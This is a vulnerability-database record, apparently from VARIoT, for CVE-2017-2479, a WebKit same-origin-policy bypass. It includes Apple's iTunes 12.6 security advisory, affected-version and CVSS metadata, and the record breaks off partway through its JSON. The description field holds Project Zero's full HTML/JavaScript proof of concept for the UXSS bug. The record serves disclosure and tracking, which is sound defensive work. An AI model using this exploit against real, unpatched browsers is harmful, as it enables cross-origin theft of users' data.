var-201704-0802
Vulnerability from variot
An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. iCloud before 6.2 on Windows is affected. iTunes before 12.6 on Windows is affected. tvOS before 10.2 is affected. The issue involves the "WebKit" component. It allows remote attackers to bypass the Same Origin Policy and obtain sensitive information via a crafted web site. WebKit is prone to multiple information-disclosure and memory-corruption vulnerabilities. Failed exploit attempts will likely cause a denial-of-service condition. Apple iOS, iCloud for Windows, iTunes for Windows, Safari, and tvOS are all products of the American company Apple (Apple). Apple iOS is an operating system developed for mobile devices; Safari is a web browser that comes with the Mac OS X and iOS operating systems by default. WebKit is an open source web browser engine developed by the KDE community and is currently used by browsers such as Apple Safari and Google Chrome. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512
APPLE-SA-2017-03-28-2 Additional information for APPLE-SA-2017-03-22-1 iTunes for Windows 12.6
iTunes for Windows 12.6 addresses the following:
APNs Server Available for: Windows 7 and later Impact: An attacker in a privileged network position can track a user's activity Description: A client certificate was sent in plaintext. This issue was addressed through improved certificate handling. CVE-2017-2383: Matthias Wachs and Quirin Scheitle of Technical University Munich (TUM) Entry added March 28, 2017
iTunes Available for: Windows 7 and later Impact: Multiple issues in SQLite Description: Multiple issues existed in SQLite. These issues were addressed by updating SQLite to version 3.15.2. CVE-2013-7443 CVE-2015-3414 CVE-2015-3415 CVE-2015-3416 CVE-2015-3717 CVE-2015-6607 CVE-2016-6153
iTunes Available for: Windows 7 and later Impact: Multiple issues in expat Description: Multiple issues existed in expat. These issues were addressed by updating expat to version 2.2.0. CVE-2009-3270 CVE-2009-3560 CVE-2009-3720 CVE-2012-1147 CVE-2012-1148 CVE-2012-6702 CVE-2015-1283 CVE-2016-0718 CVE-2016-4472 CVE-2016-5300
libxslt Available for: Windows 7 and later Impact: Multiple vulnerabilities in libxslt Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-2017-5029: Holger Fuhrmannek Entry added March 28, 2017
WebKit Available for: Windows 7 and later Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-2017-2463: Kai Kang (4B5F5F4B) of Tencent's Xuanwu Lab (tencent.com) working with Trend Micro's Zero Day Initiative Entry added March 28, 2017
WebKit Available for: Windows 7 and later Impact: Processing maliciously crafted web content may exfiltrate data cross-origin Description: A validation issue existed in element handling. This issue was addressed through improved validation. CVE-2017-2479: lokihardt of Google Project Zero CVE-2017-2480: lokihardt of Google Project Zero Entry added March 28, 2017
Installation note:
iTunes for Windows 12.6 may be obtained from: https://www.apple.com/itunes/download/
Information will also be posted to the Apple Security Updates web site: https://support.apple.com/kb/HT201222
This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE----- Comment: GPGTools - http://gpgtools.org
iQIcBAEBCgAGBQJY2sl6AAoJEIOj74w0bLRGEMAQAJjPU9+iTIEs0o4EfazvmkXj /zLRgzdfr1kp9Iu90U/ZxgnAO3ZUqEF/6FWy6dN3zSA7AlP7q+zFlxXqbkoJB+eX sE+vGilHWZ8p2Qud9EikwDKCvLNn/4xYQ9Nm0jCwA14VBS1dBlOrFUlsnM9EoS9/ YKks/NSYV9jtLgKvc42SeTks62tLL5ZQGMKv+Gg0HH2Yeug2eAHGb+u5vYCHTcER AMTKKQtr57IJyz2tg7YZGWvbKIS2690CpIyZGxpbUCKv+dNdEPsDTNHjjpzwMBtc diSIIX8AC6T0nWbrOFtWqhhFyWk6rZAWb8RvDYYd/a6ro7hxYq8xZATBS2BJFskp esMHBuFYgDwIeJiGaCW07UyJzyzDck7pesJeq7gqF+O5Fl6bdHN4b8rNmVtBvDom g7tkwSE9+ZmiPUMJGF2NUWNb4+yY0OPm3Uq2kvoyXl5KGmEaFMoDnPzKIdPmE+b+ lJZUYgQSXlO6B7uz+MBx2ntH1uhIrAdKhFiePYj/lujNB3lTij5zpCOLyivdEXZw iJHX211+FpS8VV1/dHOjgbYnvnw4wofbPN63dkYvwgwwWy7VISThXQuMqtDW/wOE 9h0me2NkZRxQ845p4MaLPqZQFi1WcU4/PbcBBb0CvBwlnonYP/YRnyQrNWx+36Fo VkUmhXDNi0csm+QTi7ZP =hPjT -----END PGP SIGNATURE-----
. WebKit: UXSS via a focus event and a link element
CVE-2017-2479
This is somewhat similar to https://crbug.com/663476.
Here's a snippet of Container::replaceAllChildren.
while (RefPtr
If the location hash value is set, the page will give focus to the associated element. However, if there is a stylesheet that has not been loaded yet, the focusing will be delayed until the stylesheet gets loaded. The problem is that when the link element linked to the last pending stylesheet is removed from the parent, the notifyChildNodeRemoved function may end up to fire a focus event which runs arbitrary JavaScript code, which can make an iframe(|g| in the PoC) that has an attached frame but has no parent.
This bug is subject to a 90 day disclosure deadline. If 90 days elapse without a broadly available patch, then the bug report will automatically become visible to the public.
Found by: lokihardt
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201704-0802",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "iphone os",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "10.3"
},
{
"model": "icloud",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "6.2"
},
{
"model": "tvos",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "10.2"
},
{
"model": "itunes",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "12.6"
},
{
"model": "safari",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "10.1"
},
{
"model": "icloud",
"scope": "eq",
"trust": 0.9,
"vendor": "apple",
"version": "6.1.1"
},
{
"model": "icloud",
"scope": "lt",
"trust": 0.8,
"vendor": "apple",
"version": "6.2 (windows 7 or later )"
},
{
"model": "ios",
"scope": "lt",
"trust": 0.8,
"vendor": "apple",
"version": "10.3 (ipad first 4 after generation )"
},
{
"model": "ios",
"scope": "lt",
"trust": 0.8,
"vendor": "apple",
"version": "10.3 (iphone 5 or later )"
},
{
"model": "ios",
"scope": "lt",
"trust": 0.8,
"vendor": "apple",
"version": "10.3 (ipod touch first 6 after generation )"
},
{
"model": "itunes",
"scope": "lt",
"trust": 0.8,
"vendor": "apple",
"version": "for windows 12.6 (windows 7 or later )"
},
{
"model": "safari",
"scope": "lt",
"trust": 0.8,
"vendor": "apple",
"version": "10.1 (macos sierra 10.12.4)"
},
{
"model": "safari",
"scope": "lt",
"trust": 0.8,
"vendor": "apple",
"version": "10.1 (os x el capitan v10.11.6)"
},
{
"model": "safari",
"scope": "lt",
"trust": 0.8,
"vendor": "apple",
"version": "10.1 (os x yosemite v10.10.5)"
},
{
"model": "tvos",
"scope": "lt",
"trust": 0.8,
"vendor": "apple",
"version": "10.2 (apple tv first 4 generation )"
},
{
"model": "tv",
"scope": "eq",
"trust": 0.6,
"vendor": "apple",
"version": "10.1.1"
},
{
"model": "iphone os",
"scope": "eq",
"trust": 0.6,
"vendor": "apple",
"version": "10.2.1"
},
{
"model": "itunes",
"scope": "eq",
"trust": 0.6,
"vendor": "apple",
"version": "12.5.5.5"
},
{
"model": "safari",
"scope": "eq",
"trust": 0.6,
"vendor": "apple",
"version": "10.0.3"
},
{
"model": "open source project webkit",
"scope": "eq",
"trust": 0.3,
"vendor": "webkit",
"version": "0"
},
{
"model": "itunes",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "12.5.5"
},
{
"model": "itunes",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "12.5.1"
},
{
"model": "itunes",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "12.4.2"
},
{
"model": "itunes",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "12.3.2"
},
{
"model": "itunes",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "12.3.1"
},
{
"model": "itunes",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "11.2.1"
},
{
"model": "itunes",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "11.1.5"
},
{
"model": "itunes",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "11.1.4"
},
{
"model": "itunes",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "11.1.3"
},
{
"model": "itunes",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "11.1.2"
},
{
"model": "itunes",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "11.1.1"
},
{
"model": "itunes",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "11.0.5"
},
{
"model": "itunes",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "11.0.4"
},
{
"model": "itunes",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "11.0.2"
},
{
"model": "itunes",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "10.6.3"
},
{
"model": "itunes",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "10.6.1"
},
{
"model": "itunes",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "10.5.1"
},
{
"model": "itunes",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "10.1.2"
},
{
"model": "itunes",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "12.5.4"
},
{
"model": "itunes",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "12.5.2"
},
{
"model": "itunes",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "12.4"
},
{
"model": "itunes",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "12.3"
},
{
"model": "itunes",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "12.2"
},
{
"model": "itunes",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "12.0.1"
},
{
"model": "itunes",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "11.2"
},
{
"model": "itunes",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "11.1"
},
{
"model": "itunes",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "11.0.3"
},
{
"model": "itunes",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "11.0.1"
},
{
"model": "itunes",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "11.0"
},
{
"model": "itunes",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "10.7"
},
{
"model": "itunes",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "10.6"
},
{
"model": "itunes",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "10.5.3"
},
{
"model": "itunes",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "10.5.2"
},
{
"model": "itunes",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "10.5"
},
{
"model": "itunes",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "10.4.1"
},
{
"model": "itunes",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "10.4"
},
{
"model": "itunes",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "10.3.1"
},
{
"model": "itunes",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "10.3"
},
{
"model": "itunes",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "10.2.2"
},
{
"model": "itunes",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "10.2"
},
{
"model": "itunes",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "10.1.1.4"
},
{
"model": "itunes",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "10.1.1"
},
{
"model": "itunes",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "10.1"
},
{
"model": "itunes",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "10.0.1"
},
{
"model": "itunes",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "10"
},
{
"model": "icloud",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "6.1"
},
{
"model": "icloud",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "6.0.1"
},
{
"model": "icloud",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "6.0"
},
{
"model": "itunes",
"scope": "ne",
"trust": 0.3,
"vendor": "apple",
"version": "12.6"
},
{
"model": "icloud",
"scope": "ne",
"trust": 0.3,
"vendor": "apple",
"version": "6.2"
}
],
"sources": [
{
"db": "BID",
"id": "97176"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-002431"
},
{
"db": "CNNVD",
"id": "CNNVD-201703-1342"
},
{
"db": "NVD",
"id": "CVE-2017-2479"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:apple:icloud",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:apple:iphone_os",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:apple:itunes",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:apple:safari",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:apple:apple_tv",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-002431"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Kai Kang (4B5F5F4B) of Tencent\u0027s Xuanwu Lab and lokihardt of Google Project Zero",
"sources": [
{
"db": "BID",
"id": "97176"
},
{
"db": "CNNVD",
"id": "CNNVD-201703-1342"
}
],
"trust": 0.9
},
"cve": "CVE-2017-2479",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "CVE-2017-2479",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.9,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "VHN-110682",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2017-2479",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.8,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2017-2479",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2017-2479",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNNVD",
"id": "CNNVD-201703-1342",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-110682",
"trust": 0.1,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2017-2479",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-110682"
},
{
"db": "VULMON",
"id": "CVE-2017-2479"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-002431"
},
{
"db": "CNNVD",
"id": "CNNVD-201703-1342"
},
{
"db": "NVD",
"id": "CVE-2017-2479"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. iCloud before 6.2 on Windows is affected. iTunes before 12.6 on Windows is affected. tvOS before 10.2 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to bypass the Same Origin Policy and obtain sensitive information via a crafted web site. WebKit is prone to multiple information-disclosure and memory-corruption vulnerabilities. Failed exploit attempts will likely cause a denial-of-service condition. Apple iOS, iCloud for Windows, iTunes for Windows, Safari, and tvOS are all products of the American company Apple (Apple). Apple iOS is an operating system developed for mobile devices; Safari is a web browser that comes with the Mac OS X and iOS operating systems by default. WebKit is an open source web browser engine developed by the KDE community and is currently used by browsers such as Apple Safari and Google Chrome. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA512\n\nAPPLE-SA-2017-03-28-2 Additional information for\nAPPLE-SA-2017-03-22-1 iTunes for Windows 12.6\n\niTunes for Windows 12.6 addresses the following:\n\nAPNs Server\nAvailable for: Windows 7 and later\nImpact: An attacker in a privileged network position can track a\nuser\u0027s activity\nDescription: A client certificate was sent in plaintext. This issue\nwas addressed through improved certificate handling. \nCVE-2017-2383: Matthias Wachs and Quirin Scheitle of Technical\nUniversity Munich (TUM)\nEntry added March 28, 2017\n\niTunes\nAvailable for: Windows 7 and later\nImpact: Multiple issues in SQLite\nDescription: Multiple issues existed in SQLite. These issues were\naddressed by updating SQLite to version 3.15.2. \nCVE-2013-7443\nCVE-2015-3414\nCVE-2015-3415\nCVE-2015-3416\nCVE-2015-3717\nCVE-2015-6607\nCVE-2016-6153\n\niTunes\nAvailable for: Windows 7 and later\nImpact: Multiple issues in expat\nDescription: Multiple issues existed in expat. These issues were\naddressed by updating expat to version 2.2.0. \nCVE-2009-3270\nCVE-2009-3560\nCVE-2009-3720\nCVE-2012-1147\nCVE-2012-1148\nCVE-2012-6702\nCVE-2015-1283\nCVE-2016-0718\nCVE-2016-4472\nCVE-2016-5300\n\nlibxslt\nAvailable for: Windows 7 and later\nImpact: Multiple vulnerabilities in libxslt\nDescription: Multiple memory corruption issues were addressed through\nimproved memory handling. \nCVE-2017-5029: Holger Fuhrmannek\nEntry added March 28, 2017\n\nWebKit\nAvailable for: Windows 7 and later\nImpact: Processing maliciously crafted web content may lead to\narbitrary code execution\nDescription: Multiple memory corruption issues were addressed through\nimproved memory handling. \nCVE-2017-2463: Kai Kang (4B5F5F4B) of Tencent\u0027s Xuanwu Lab\n(tencent.com) working with Trend Micro\u0027s Zero Day Initiative\nEntry added March 28, 2017\n\nWebKit\nAvailable for: Windows 7 and later\nImpact: Processing maliciously crafted web content may exfiltrate\ndata cross-origin\nDescription: A validation issue existed in element handling. This\nissue was addressed through improved validation. \nCVE-2017-2479: lokihardt of Google Project Zero\nCVE-2017-2480: lokihardt of Google Project Zero\nEntry added March 28, 2017\n\nInstallation note:\n\niTunes for Windows 12.6 may be obtained from:\nhttps://www.apple.com/itunes/download/\n\nInformation will also be posted to the Apple Security Updates\nweb site: https://support.apple.com/kb/HT201222\n\nThis message is signed with Apple\u0027s Product Security PGP key,\nand details are available at:\nhttps://www.apple.com/support/security/pgp/\n-----BEGIN PGP SIGNATURE-----\nComment: GPGTools - http://gpgtools.org\n\niQIcBAEBCgAGBQJY2sl6AAoJEIOj74w0bLRGEMAQAJjPU9+iTIEs0o4EfazvmkXj\n/zLRgzdfr1kp9Iu90U/ZxgnAO3ZUqEF/6FWy6dN3zSA7AlP7q+zFlxXqbkoJB+eX\nsE+vGilHWZ8p2Qud9EikwDKCvLNn/4xYQ9Nm0jCwA14VBS1dBlOrFUlsnM9EoS9/\nYKks/NSYV9jtLgKvc42SeTks62tLL5ZQGMKv+Gg0HH2Yeug2eAHGb+u5vYCHTcER\nAMTKKQtr57IJyz2tg7YZGWvbKIS2690CpIyZGxpbUCKv+dNdEPsDTNHjjpzwMBtc\ndiSIIX8AC6T0nWbrOFtWqhhFyWk6rZAWb8RvDYYd/a6ro7hxYq8xZATBS2BJFskp\nesMHBuFYgDwIeJiGaCW07UyJzyzDck7pesJeq7gqF+O5Fl6bdHN4b8rNmVtBvDom\ng7tkwSE9+ZmiPUMJGF2NUWNb4+yY0OPm3Uq2kvoyXl5KGmEaFMoDnPzKIdPmE+b+\nlJZUYgQSXlO6B7uz+MBx2ntH1uhIrAdKhFiePYj/lujNB3lTij5zpCOLyivdEXZw\niJHX211+FpS8VV1/dHOjgbYnvnw4wofbPN63dkYvwgwwWy7VISThXQuMqtDW/wOE\n9h0me2NkZRxQ845p4MaLPqZQFi1WcU4/PbcBBb0CvBwlnonYP/YRnyQrNWx+36Fo\nVkUmhXDNi0csm+QTi7ZP\n=hPjT\n-----END PGP SIGNATURE-----\n\n\n\n. WebKit: UXSS via a focus event and a link element \n\nCVE-2017-2479\n\n\nThis is somewhat similar to \u003ca href=\"https://crbug.com/663476\" title=\"\" class=\"\" rel=\"nofollow\"\u003ehttps://crbug.com/663476\u003c/a\u003e. \n\nHere\u0027s a snippet of Container::replaceAllChildren. \n\nwhile (RefPtr\u003cNode\u003e child = m_firstChild) {\n removeBetween(nullptr, child-\u003enextSibling(), *child);\n notifyChildNodeRemoved(*this, *child);\n}\n\nIf the location hash value is set, the page will give focus to the associated element. However, if there is a stylesheet that has not been loaded yet, the focusing will be delayed until the stylesheet gets loaded. The problem is that when the link element linked to the last pending stylesheet is removed from the parent, the notifyChildNodeRemoved function may end up to fire a focus event which runs arbitrary JavaScript code, which can make an iframe(|g| in the PoC) that has an attached frame but has no parent. \n\n\u003chtml\u003e\n\u003chead\u003e\n\u003c/head\u003e\n\u003cbody\u003e\n\u003cscript\u003e\n\nlet f = document.body.appendChild(document.createElement(\u0027iframe\u0027));\nlet inp = f.contentDocument.head.appendChild(document.createElement(\u0027input\u0027));\nlet link = inp.appendChild(document.createElement(\u0027link\u0027));\nlink.rel = \u0027stylesheet\u0027;\nlink.href = \u0027data:,aaaaazxczxczzxzcz\u0027;\n\nlet btn = f.contentDocument.body.appendChild(document.createElement(\u0027button\u0027));\nbtn.id = \u0027btn\u0027;\nbtn.onfocus = () =\u003e {\n btn.onfocus = null;\n\n window.g = inp.appendChild(document.createElement(\u0027iframe\u0027));\n window.g.onload = () =\u003e {\n window.g.onload = null;\n\n window.g.src = \u0027javascript:alert(location)\u0027;\n let xml = `\n\u003csvg xmlns=\"\u003ca href=\"http://www.w3.org/2000/svg\" title=\"\" class=\"\" rel=\"nofollow\"\u003ehttp://www.w3.org/2000/svg\u003c/a\u003e\"\u003e\n\u003cscript\u003e\ndocument.documentElement.appendChild(parent.g);\n\n\u003c/sc` + `ript\u003e\n\u003celement a=\"1\" a=\"2\" /\u003e\n\u003c/svg\u003e`;\n\n let h = document.body.appendChild(document.createElement(\u0027iframe\u0027));\n h.src = URL.createObjectURL(new Blob([xml], {type: \u0027text/xml\u0027}));\n };\n\n window.g.src = \u0027\u003ca href=\"https://abc.xyz/\u0027;\" title=\"\" class=\"\" rel=\"nofollow\"\u003ehttps://abc.xyz/\u0027;\u003c/a\u003e\n};\n\nf.contentWindow.location.hash = \u0027btn\u0027;\ninp.textContent = \u0027\u0027;\n\n\u003c/script\u003e\n\u003c/body\u003e\n\u003c/html\u003e\n\nThis bug is subject to a 90 day disclosure deadline. If 90 days elapse\nwithout a broadly available patch, then the bug report will automatically\nbecome visible to the public. \n\n\n\n\nFound by: lokihardt\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-2479"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-002431"
},
{
"db": "BID",
"id": "97176"
},
{
"db": "VULHUB",
"id": "VHN-110682"
},
{
"db": "VULMON",
"id": "CVE-2017-2479"
},
{
"db": "PACKETSTORM",
"id": "141936"
},
{
"db": "PACKETSTORM",
"id": "141937"
},
{
"db": "PACKETSTORM",
"id": "141979"
}
],
"trust": 2.34
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-110682",
"trust": 0.1,
"type": "unknown"
},
{
"reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=41866",
"trust": 0.1,
"type": "exploit"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-110682"
},
{
"db": "VULMON",
"id": "CVE-2017-2479"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-2479",
"trust": 3.2
},
{
"db": "BID",
"id": "97176",
"trust": 2.1
},
{
"db": "EXPLOIT-DB",
"id": "41866",
"trust": 1.8
},
{
"db": "SECTRACK",
"id": "1038157",
"trust": 1.8
},
{
"db": "JVN",
"id": "JVNVU90482935",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2017-002431",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201703-1342",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "141979",
"trust": 0.2
},
{
"db": "SEEBUG",
"id": "SSVID-92922",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-110682",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2017-2479",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "141936",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "141937",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-110682"
},
{
"db": "VULMON",
"id": "CVE-2017-2479"
},
{
"db": "BID",
"id": "97176"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-002431"
},
{
"db": "PACKETSTORM",
"id": "141936"
},
{
"db": "PACKETSTORM",
"id": "141937"
},
{
"db": "PACKETSTORM",
"id": "141979"
},
{
"db": "CNNVD",
"id": "CNNVD-201703-1342"
},
{
"db": "NVD",
"id": "CVE-2017-2479"
}
]
},
"id": "VAR-201704-0802",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-110682"
}
],
"trust": 0.01
},
"last_update_date": "2024-11-23T20:58:22.926000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Apple security updates",
"trust": 0.8,
"url": "https://support.apple.com/en-us/HT201222"
},
{
